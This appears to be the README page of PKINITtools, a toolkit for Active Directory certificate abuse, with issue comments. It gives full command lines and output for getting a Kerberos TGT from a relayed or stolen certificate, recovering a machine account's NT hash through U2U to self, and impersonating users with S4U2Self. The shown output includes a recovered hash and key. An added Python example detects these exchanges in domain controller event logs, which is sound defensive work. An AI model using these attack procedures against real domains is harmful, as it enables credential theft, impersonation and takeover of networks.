PKINIT tools

This repository contains some utilities for playing with PKINIT and certificates.
The tools are built on minikerberos and impacket. Accompanying blogpost with more context: https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/

Installation

These tools are only compatible with Python 3.5+. Clone the repository from GitHub, install the dependencies and you should be good to go:

git clone https://github.com/dirkjanm/PKINITtools
pip3 install impacket minikerberos

Using a virtualenv for this is recommended.

Tools

gettgtpkinit.py

Request a TGT using a PFX file, supplied either as a file or as a base64-encoded blob, or using PEM files for the certificate and key. This uses Kerberos PKINIT and will write a TGT into the specified ccache. It will also print the AS-REP encryption key, which you may need for the getnthash.py tool. Usage example:

(PKINITtools) user@localhost:~/PKINITtools$ python gettgtpkinit.py -h
usage: gettgtpkinit.py [-h] [-cert-pfx file] [-pfx-pass password] [-pfx-base64 BASE64] [-cert-pem file] [-key-pem file] [-dc-ip DC_IP] [-v]
                       domain/username ccache

Requests a TGT using Kerberos PKINIT and either a PEM or PFX based certificate+key

positional arguments:
  domain/username     Domain and username in the cert
  ccache              ccache file to store the TGT in

optional arguments:
  -h, --help          show this help message and exit
  -cert-pfx file      PFX file
  -pfx-pass password  PFX file password
  -pfx-base64 BASE64  PFX file as base64 string
  -cert-pem file      Certificate in PEM format
  -key-pem file       Private key file in PEM format
  -dc-ip DC_IP        DC IP or hostname to use as KDC
  -v, --verbose

(PKINITtools) user@localhost:~/PKINITtools$ python gettgtpkinit.py testsegment.local/s2019dc\$ -cert-pfx ~/impacket-py3/cert.pfx -pfx-pass hoi s2019dc.ccache
2021-07-27 21:25:24,299 minikerberos INFO     Loading certificate and key from file
2021-07-27 21:25:24,316 minikerberos INFO     Requesting TGT
2021-07-27 21:25:24,333 minikerberos INFO     AS-REP encryption key (you might need this later):
2021-07-27 21:25:24,333 minikerberos INFO     5769dff44ebeaa5a37b4e9f7005f63063ffd7c198b747ae72021901e8063b0e3
2021-07-27 21:25:24,336 minikerberos INFO     Saved TGT to file

getnthash.py

Use Kerberos U2U to submit a TGS request for yourself. The resulting ticket will include the PAC, which in turn contains the NT hash that you can decrypt with the AS-REP key that was used for your specific TGT (the PAC's credential-information buffer is only included for PKINIT logons and is encrypted with the AS reply key, which is why that key is needed). It's magic really. This tool requires a TGT resulting from PKINIT to be in the ccache referenced by your KRB5CCNAME env variable. Usage:

(PKINITtools) user@localhost:~/PKINITtools$ python getnthash.py -h
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

usage: getnthash.py [-h] -key KEY [-dc-ip ip address] [-debug] identity

positional arguments:
  identity           domain/username

optional arguments:
  -h, --help         show this help message and exit
  -key KEY           AS REP key from gettgtpkinit.py
  -dc-ip ip address  IP Address of the domain controller. If ommited it use the domain part (FQDN) specified in the target parameter
  -debug             Turn DEBUG output ON

(PKINITtools) user@localhost:~/PKINITtools$ export KRB5CCNAME=s2019dc.ccache
(PKINITtools) user@localhost:~/PKINITtools$ python getnthash.py testsegment.local/s2019dc\$ -key 5769dff44ebeaa5a37b4e9f7005f63063ffd7c198b747ae72021901e8063b0e3
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash
fa6b130d73311d1be5495f589f9f4571
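
The two exchanges that gettgtpkinit.py and getnthash.py perform leave distinct traces on the domain controller, so here is an added example, written for this page and not part of PKINITtools, of how a defender might spot them in Windows Security event telemetry. It assumes the documented 4768/4769 event fields (Pre-Authentication Type 16 is PA-PK-AS-REQ, i.e. PKINIT; a U2U request to self appears as a 4769 whose Service Name equals the requesting account). The key=value line layout, the sample records, the issuer/thumbprint values and the ten-minute correlation window are constructed for the example and are not real telemetry or a vendor schema.

```python
"""Heuristic detection of the PKINIT TGT and U2U-to-self exchanges described above.

Example code, not part of PKINITtools.  Windows logs an AS exchange as event
4768 and a TGS exchange as event 4769.  A PKINIT logon (what gettgtpkinit.py
does) produces a 4768 with Pre-Authentication Type 16 (PA-PK-AS-REQ, RFC 4556)
and populated certificate fields.  A user-to-user TGS request "to self" (what
getnthash.py does) produces a 4769 whose ServiceName is the requesting account.
The records below are constructed; key names follow the 4768/4769 schema, but
the one-line key=value layout is this example's own, not EVTX or XML.
"""
from __future__ import annotations

from datetime import datetime, timedelta

PA_PK_AS_REQ = "16"  # pre-authentication type logged in 4768 for PKINIT

# Constructed sample telemetry (not real logs).  Account and realm names echo
# the README's demo; issuer and thumbprint values are placeholders.
SAMPLE_EVENTS = [
    "2021-07-27T21:25:24 EventID=4768 TargetUserName=s2019dc$ "
    "TargetDomainName=TESTSEGMENT.LOCAL PreAuthType=16 "
    "CertIssuerName=CONSTRUCTED-CA CertThumbprint=CONSTRUCTED_THUMBPRINT IpAddress=10.0.0.50",
    "2021-07-27T21:25:40 EventID=4769 TargetUserName=s2019dc$@TESTSEGMENT.LOCAL "
    "ServiceName=s2019dc$ IpAddress=10.0.0.50",
    "2021-07-27T21:30:00 EventID=4768 TargetUserName=alice "
    "TargetDomainName=TESTSEGMENT.LOCAL PreAuthType=2 CertIssuerName= CertThumbprint= "
    "IpAddress=10.0.0.20",
    "2021-07-27T21:31:00 EventID=4769 TargetUserName=alice@TESTSEGMENT.LOCAL "
    "ServiceName=FILESERVER$ IpAddress=10.0.0.20",
]


def parse_event(line: str) -> dict:
    """Parse one constructed 'timestamp key=value ...' record into a dict."""
    ts, _, rest = line.partition(" ")
    ev = {"Timestamp": datetime.fromisoformat(ts)}
    for token in rest.split():
        key, _, value = token.partition("=")
        ev[key] = value
    return ev


def account_of(ev: dict) -> str:
    """Normalise the account: drop any @REALM suffix and fold case."""
    return ev.get("TargetUserName", "").split("@", 1)[0].lower()


def is_pkinit_tgt(ev: dict) -> bool:
    """A 4768 with pre-auth type 16 (PA-PK-AS-REQ) is a PKINIT TGT request."""
    return ev.get("EventID") == "4768" and ev.get("PreAuthType") == PA_PK_AS_REQ


def is_u2u_self_tgs(ev: dict) -> bool:
    """A 4769 whose ServiceName is the requesting account itself (U2U to self)."""
    return ev.get("EventID") == "4769" and ev.get("ServiceName", "").lower() == account_of(ev)


def correlate(lines: list, window: timedelta = timedelta(minutes=10)) -> list:
    """Emit one finding per matching event, plus a high-severity finding when the
    same account goes PKINIT TGT -> U2U self TGS within `window` (a heuristic for
    the NT hash recovery flow this page describes; the window is an assumption)."""
    findings = []
    last_pkinit = {}  # account -> timestamp of its most recent PKINIT TGT
    events = sorted((parse_event(l) for l in lines), key=lambda e: e["Timestamp"])
    for ev in events:
        acct = account_of(ev)
        if is_pkinit_tgt(ev):
            last_pkinit[acct] = ev["Timestamp"]
            findings.append({"account": acct, "kind": "pkinit_tgt", "severity": "info",
                             "issuer": ev.get("CertIssuerName", "")})
        elif is_u2u_self_tgs(ev):
            findings.append({"account": acct, "kind": "u2u_self_tgs", "severity": "medium"})
            t0 = last_pkinit.get(acct)
            if t0 is not None and timedelta(0) <= ev["Timestamp"] - t0 <= window:
                findings.append({"account": acct, "kind": "pkinit_then_u2u_self",
                                 "severity": "high"})
    return findings


if __name__ == "__main__":
    for finding in correlate(SAMPLE_EVENTS):
        print(finding)
```

Pre-authentication type 16 by itself is not suspicious: every legitimate smart card logon produces it, so baseline the issuer and whether the account is a computer account before alerting on the first rule alone. The U2U-to-self rule is the stronger signal, since ordinary clients have no reason to request a service ticket to their own principal, and the correlated finding is the one worth paging on.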

gets4uticket.py

Uses Kerberos S4U2Self to request a service ticket that is valid on the host for which you've obtained a certificate. This ticket can then be used to interact with the original host. This only requires a TGT for the machine account of that host, which should be in a ccache file that you specify in the kerberos_connection_url. The only accepted kerberos_connection_url for this example is one containing a ccache file, for example kerberos+ccache://domain.local\\victimhostname\$:[email protected]. The SPN should be a service name on the host you are impersonating; you can't use this for delegation attacks (it does not implement S4U2Proxy, and there are plenty of tools already for that). Usage:

(PKINITtools) user@localhost:~/PKINITtools$ python gets4uticket.py -h
usage: gets4uticket.py [-h] [-v] kerberos_connection_url spn targetuser ccache

Gets an S4U2self ticket impersonating given user

positional arguments:
  kerberos_connection_url
                        the kerberos target string in the following format kerberos+ccache://domain\user:file.ccache@
  spn                   the service principal in format /@ Example: cifs/[email protected] for a
                        TGS ticket to be used for file access on server "fileserver". IMPORTANT: SERVER'S HOSTNAME MUST BE USED, NOT IP!!!
  targetuser
  ccache                ccache file to store the TGT ticket in

optional arguments:
  -h, --help            show this help message and exit
  -v, --verbose

(PKINITtools) user@localhost:~/PKINITtools$ python gets4uticket.py kerberos+ccache://testsegment.local\\s2019dc\$:[email protected] cifs/[email protected] [email protected] out.ccache -v
2021-07-28 10:09:13,687 minikerberos INFO     Trying to get SPN with [email protected] for cifs/[email protected]
2021-07-28 10:09:13,695 minikerberos INFO     Success!
2021-07-28 10:09:13,696 minikerberos INFO     Done!

License

MIT

Credits

Comments
  • Error Code: 62 Reason: The client trust failed or is not implemented

    Hello, I get this error when trying to get a TGT with gettgtpkinit.py (it's OK with Rubeus):

    python3 gettgtpkinit.py EVIL/DC1-WS2019$ -pfx-base64 @base64Value -dc-ip 192.168.114.2 DC-WS2019.ccache

    2021-11-28 04:54:42,236 minikerberos INFO Loading certificate and key from file
    2021-11-28 04:54:42,314 minikerberos INFO Requesting TGT
    Traceback (most recent call last):
      File "/home/kali/Take and learn/PKINITtools-master/gettgtpkinit.py", line 349, in <module>
        main()
      File "/home/kali/Take and learn/PKINITtools-master/gettgtpkinit.py", line 345, in main
        amain(args)
      File "/home/kali/Take and learn/PKINITtools-master/gettgtpkinit.py", line 315, in amain
        res = sock.sendrecv(req)
      File "/home/kali/Take and learn/MSEFSR ADCS/impacket/impacket/lib/python3.9/site-packages/minikerberos/network/clientsocket.py", line 87, in sendrecv
        raise KerberosError(krb_message)
    minikerberos.protocol.errors.KerberosError: Error Code: 62 Reason: The client trust failed or is not implemented

    opened by ivanov21 3
  • Fixed kdcHost set to None

    When requesting the ticket, the sendReceive() function was called with the kdcHost argument set to None, preventing the script from working when DNS resolution is not set up properly on the host.

    python3 getnthash.py -key "2ddb [...] 9969" -dc-ip "192.168.56.101" "domain.local/user2"
    Impacket v0.9.24.dev1+20210706.140217.6da655ca - Copyright 2021 SecureAuth Corporation
    
    [*] Using TGT from cache
    [*] Requesting ticket to self with PAC
    [-] [Errno Connection error (DOMAIN.LOCAL:88)] [Errno -2] Name or service not known
    
    opened by ShutdownRepo 1
  • Missing minikerberos.pkinit

    Python version: Python 3.9
    OS: Kali Linux 2021.XX
    PKINIT Status: Worked with Rubeus

    I encountered the error from minikerberos.pkinit import PKINIT missing. I had installed oscrypto and minikerberos and also did python -m pip install -r requirements.txt to no avail. I tried sudo and no sudo adaptions also to no avail. In the end, I found that uninstalling minikerberos and installing from their GitHub repository succeeded.

    Adding this issue to note the workaround for future reference and closing due to likely pip being out-of-date.

    opened by Zamanry 0
  • AttributeError: 'str' object has no attribute 'value'

    Hi,

    Thank you for your effort developing this tool. I am trying to use the tool to request a TGT but it currently fails. See below for the command I used and the related error.

    ──(shadow)─(root💀kali)-[/home/kali/pentest/PKINITtools-master]
    └─# python3 gettgtpkinit.py adlab.local/user_t_1_admins user_t_1_admins.ccache -cert-pfx /home/kali/pentest/pywhisker-main/hHKEiIIf.pfx -pfx-pass OhEKkA1wkW7FC1xUX337
    2021-09-13 19:40:13,894 minikerberos INFO Loading certificate and key from file
    2021-09-13 19:40:13,919 minikerberos INFO Requesting TGT
    Traceback (most recent call last):
      File "/home/kali/pentest/PKINITtools-master/gettgtpkinit.py", line 349, in <module>
        main()
      File "/home/kali/pentest/PKINITtools-master/gettgtpkinit.py", line 345, in main
        amain(args)
      File "/home/kali/pentest/PKINITtools-master/gettgtpkinit.py", line 315, in amain
        res = sock.sendrecv(req)
      File "/home/kali/pentest/PKINITtools-master/shadow/lib/python3.9/site-packages/minikerberos/network/clientsocket.py", line 87, in sendrecv
        raise KerberosError(krb_message)
      File "/home/kali/pentest/PKINITtools-master/shadow/lib/python3.9/site-packages/minikerberos/protocol/errors.py", line 20, in __init__
        super(Exception, self).__init__('%s Error Code: %d Reason: %s ' % (extra_msg, self.errorcode.value, self.errormsg.value))
    AttributeError: 'str' object has no attribute 'value'

    opened by jsdhasfeds 5
  • KDC has no support for PADATA type (pre-authentication data)

    When I get a TGT from a certificate, I get the error shown below:

    python3 gettgtpkinit.py -cert-pfx ../temp/PetitPotam/host1.pfx -dc-ip 10.0.0.0.1 domain/test$ test.ccache -v 1 ⨯
    2021-07-30 04:59:22,388 minikerberos INFO Loading certificate and key from file
    2021-07-30 04:59:22,507 minikerberos INFO Requesting TGT
    Traceback (most recent call last):
      File "/home/kali/PKINITtools/gettgtpkinit.py", line 349, in <module>
        main()
      File "/home/kali/PKINITtools/gettgtpkinit.py", line 345, in main
        amain(args)
      File "/home/kali/PKINITtools/gettgtpkinit.py", line 315, in amain
        res = sock.sendrecv(req)
      File "/usr/local/lib/python3.9/dist-packages/minikerberos-0.2.14-py3.9.egg/minikerberos/network/clientsocket.py", line 87, in sendrecv
    minikerberos.protocol.errors.KerberosError: Error Code: 16 Reason: KDC has no support for PADATA type (pre-authentication data)

    opened by sharp-shooter 4
Owner
Dirk-jan